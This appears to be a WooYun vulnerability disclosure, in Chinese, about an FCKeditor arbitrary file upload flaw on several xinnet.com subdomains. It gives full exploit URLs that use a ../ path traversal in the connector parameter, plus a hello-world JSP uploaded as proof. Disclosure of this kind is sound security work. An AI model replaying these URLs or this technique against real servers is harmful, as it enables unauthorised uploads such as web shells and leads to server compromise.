WooYun.org

漏洞很低级，对安全重视一些即可避免。
FCKeditor任意文件上传
新网主站出现过FCKeditor的漏洞、代理商的网站系统也出现过FCKeditor漏洞，可见新网的很多web系统是用FCKeditor编辑器的
那么其他分站是不是也存在这种漏洞呢？
这里我们看下http://qqmail.xinnet.com
http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
很不幸 返回状态是404
那么是不是qqmail.xinnet.com就不是使用FCKeditor呢？
我们继续看 于是发现了：
http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
返回HTTP Status 500 很明显 文件是存在的
新网应该是对FCKeditor的问题做过考虑的
那这样我们是不是就无法利用了呢？
不是的 我们可以本地构建个表单向http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector提交
但事实上不用这么麻烦
后来我又发现了这个
http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
当然 这个url是不对的

因为connectors/jsp/connector这个路径是错误的
正确的url:
http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
到这里我们就可以上传任意文件了
传个helloworld吧

<HTML>
<HEAD>
<TITLE>HelloWorld!</TITLE>
</HEAD>
<BODY>
<%
out.println("<h1>Hello World!<br>世界，你好！</h1>");
%>
</BODY>
</HTML>

其他的还有：
http://sinamail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
http://api.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector